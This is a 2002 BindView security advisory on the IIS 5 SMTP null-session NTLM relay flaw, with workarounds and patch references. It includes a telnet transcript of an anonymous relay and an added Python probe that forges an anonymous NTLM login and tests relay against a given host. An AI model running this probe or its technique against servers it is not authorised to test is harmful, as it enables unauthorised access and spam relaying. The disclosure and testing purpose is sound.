SECURITYVULNS:DOC:2573 (securityvulns, via vulners.com; Mar 02, 2002)

IIS SMTP component allows mail relaying via Null Session

BindView Security Advisory

IIS SMTP component allows mail relaying via Null Session
Issue Date: March 1, 2002
Contact: [email protected]

Topic:
The SMTP component that comes with IIS can be used by anyone for
relaying email.

Overview:
IIS comes with a small SMTP component. Its default relay restrictions
allow any client that successfully authenticates to relay email. Because
the AUTH mechanism list includes NTLM, and NTLM accepts null session
(anonymous) credentials, anyone can "authenticate" without a password
and then relay email.

Affected Systems:
IIS 5 servers with the SMTP component enabled.
IIS 4 was not tested.

Impact:
The vulnerability would likely be exploited by spammers to
misappropriate bandwidth and CPU time. There does not appear to be
any way of using this vulnerability to run arbitrary code or otherwise
gain access to the vulnerable system.

Details:

The SMTP component supports the SMTP AUTH command and offers NTLM as one
of its mechanisms. This is intended to let legitimate users authenticate
via an NTLM challenge-response. However, NTLM also accepts null session
credentials (empty user name, empty domain, no password-derived response),
so an anonymous client can complete the exchange and be treated as an
authenticated user. Once that succeeds, the SMTP service will relay email
for the session.

A sample transcript follows. The initial RCPT failure is not necessary; it
is included only to show that relaying requires authentication. (Release
of the actual NTLM authentication data is being delayed in accordance with
draft-christey-wysopal-vuln-disclosure-00.txt.)

% telnet 192.168.8.129 25
Trying 192.168.8.129…
Connected to 192.168.8.129.
Escape character is '^]'.
220 w2ks.w2kvm.qnz.org Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at Wed, 29 Aug 2001 11:52:15 -0400
HELO foo
250 w2ks.w2kvm.qnz.org Hello [192.168.8.1]
MAIL From:<>
250 2.1.0 <>…Sender OK
RCPT To:<[email protected]>
550 5.7.1 Unable to relay for [email protected]
AUTH NTLM <etc, etc>
334 <etc, etc>
<etc, etc>
235 2.7.0 Authentication successfull
MAIL From:<>
503 5.5.2 Sender already specified
RCPT To:<[email protected]>
250 2.1.5 [email protected]
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Subject: your SMTP server supports null sessions

yada yada yada

.
250 2.6.0 <[email protected]> Queued mail for delivery
QUIT
221 2.0.0 w2ks.w2kvm.qnz.org Service closing transmission channel
Connection closed by foreign host.
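The exchange above, written out as a probe script. This is an added example, not BindView's or Microsoft's code; it builds the NTLM NEGOTIATE message and an anonymous (null session) AUTHENTICATE message itself, drives the same MAIL/RCPT/AUTH sequence the transcript shows (with an RSET before AUTH, so the second MAIL FROM does not hit the "Sender already specified" error seen above), and stops before DATA so no mail is actually queued. The host names, addresses and the scripted server replies used for the offline demonstration are constructed for illustration.

```python
"""Probe: does this SMTP server relay after a null-session AUTH NTLM?

Added example (not from the advisory). The AUTHENTICATE message carries an
empty user name and domain, a one-byte LM response, an empty NT response and
the NTLMSSP_NEGOTIATE_ANONYMOUS flag, so no password is ever involved.
"""
import base64
import socket
import struct
import sys

NTLMSSP = b"NTLMSSP\x00"
NEG_UNICODE, NEG_OEM, REQ_TARGET = 0x1, 0x2, 0x4
NEG_NTLM, NEG_ANONYMOUS = 0x200, 0x800


def _fields(*values, first_offset):
    """Pack NTLM (len, maxlen, offset) descriptors plus the payload they point at."""
    desc, payload, off = b"", b"", first_offset
    for v in values:
        desc += struct.pack("<HHI", len(v), len(v), off)
        payload, off = payload + v, off + len(v)
    return desc, payload


def ntlm_type1() -> bytes:
    """NEGOTIATE (type 1) with empty domain and workstation: 32 bytes."""
    flags = NEG_UNICODE | NEG_OEM | REQ_TARGET | NEG_NTLM
    desc, payload = _fields(b"", b"", first_offset=32)
    return NTLMSSP + struct.pack("<II", 1, flags) + desc + payload


def parse_type2(blob: bytes) -> bytes:
    """Return the 8-byte server challenge from a CHALLENGE (type 2) message."""
    if blob[:8] != NTLMSSP or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM type 2 message")
    return blob[24:32]


def ntlm_type3_anonymous() -> bytes:
    """AUTHENTICATE (type 3) for a null session; the challenge is never used."""
    flags = NEG_UNICODE | NEG_NTLM | NEG_ANONYMOUS
    # 12-byte header, six 8-byte descriptors, 4 flag bytes: payload starts at 64
    desc, payload = _fields(b"\x00", b"", b"", b"", b"", b"", first_offset=64)
    return NTLMSSP + struct.pack("<I", 3) + desc + struct.pack("<I", flags) + payload


class Smtp:
    """Line-oriented SMTP client over anything with recv()/sendall()."""

    def __init__(self, conn):
        self.conn, self.buf = conn, b""

    def reply(self):
        """Read one (possibly multi-line) reply; return (code, [text lines])."""
        texts = []
        while True:
            while b"\r\n" not in self.buf:
                chunk = self.conn.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                self.buf += chunk
            line, self.buf = self.buf.split(b"\r\n", 1)
            texts.append(line[4:].decode("ascii", "replace"))
            if line[3:4] != b"-":
                return int(line[:3]), texts

    def cmd(self, line: str):
        self.conn.sendall(line.encode("ascii") + b"\r\n")
        return self.reply()


def probe(conn, sender="<>", rcpt="<relaytest@example.net>"):
    """Try to relay before and after a null-session AUTH NTLM; never sends DATA."""
    s = Smtp(conn)
    s.reply()                                   # banner
    s.cmd("EHLO probe.example.net")
    s.cmd(f"MAIL FROM:{sender}")
    code, _ = s.cmd(f"RCPT TO:{rcpt}")
    out = {"relay_unauthenticated": code == 250, "null_auth": False}
    s.cmd("RSET")                               # fresh envelope for the second attempt
    code, text = s.cmd("AUTH NTLM " + base64.b64encode(ntlm_type1()).decode())
    if code == 334:
        parse_type2(base64.b64decode(text[0]))  # sanity-check the challenge only
        code, _ = s.cmd(base64.b64encode(ntlm_type3_anonymous()).decode())
        out["null_auth"] = code == 235
    if out["null_auth"]:
        s.cmd(f"MAIL FROM:{sender}")
        code, _ = s.cmd(f"RCPT TO:{rcpt}")
        out["relay_after_null_auth"] = code == 250
    s.cmd("QUIT")
    return out


class ScriptedServer:
    """Fake transport replaying constructed replies modelled on the transcript."""

    def __init__(self, replies):
        self.replies, self.sent = list(replies), []

    def sendall(self, data):
        self.sent.append(data)

    def recv(self, n):
        return self.replies.pop(0) if self.replies else b""


def demo_vulnerable_server():
    """Offline replay: relay refused anonymously, accepted after null-session AUTH."""
    type2 = (NTLMSSP + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 40)
             + struct.pack("<I", 0x205) + bytes(range(8)) + bytes(8))
    replies = [b"220 w2ks ready\r\n", b"250-w2ks Hello\r\n250 AUTH NTLM\r\n",
               b"250 2.1.0 <>...Sender OK\r\n", b"550 5.7.1 Unable to relay\r\n",
               b"250 2.0.0 Reset\r\n", b"334 " + base64.b64encode(type2) + b"\r\n",
               b"235 2.7.0 Authentication successful\r\n", b"250 2.1.0 <>...Sender OK\r\n",
               b"250 2.1.5 relaytest@example.net\r\n", b"221 bye\r\n"]
    return probe(ScriptedServer(replies))


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # python probe.py <host>  (port 25)
        with socket.create_connection((sys.argv[1], 25), timeout=30) as sock:
            print(probe(sock))
    else:
        print(demo_vulnerable_server())
```

Run it against a host you are authorised to test; a result with `null_auth` and `relay_after_null_auth` both true is the condition the advisory describes. The probe only checks the RCPT verdict and quits, which is enough to decide the question without queueing a message.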

Workarounds:
Disable the SMTP service.
Disable the relay-restrictions option that lets any authenticated client
relay email (so that authentication alone no longer grants relay).
Firewall off the SMTP service from untrusted networks.

Recommendations:
Disable the SMTP service, if not needed.
Install the patch from Microsoft (see References below).

References:

Microsoft's security bulletin:
http://www.microsoft.com/technet/security/bulletin/MS02-011.asp

Microsoft's Hotfix:
Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=36556
(the download page mentions ms02-012, but the patch also covers ms02-011)

Exchange 5.5: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=33423

Microsoft's Knowledge Base article:
http://www.microsoft.com/technet/support/kb.asp?ID=310669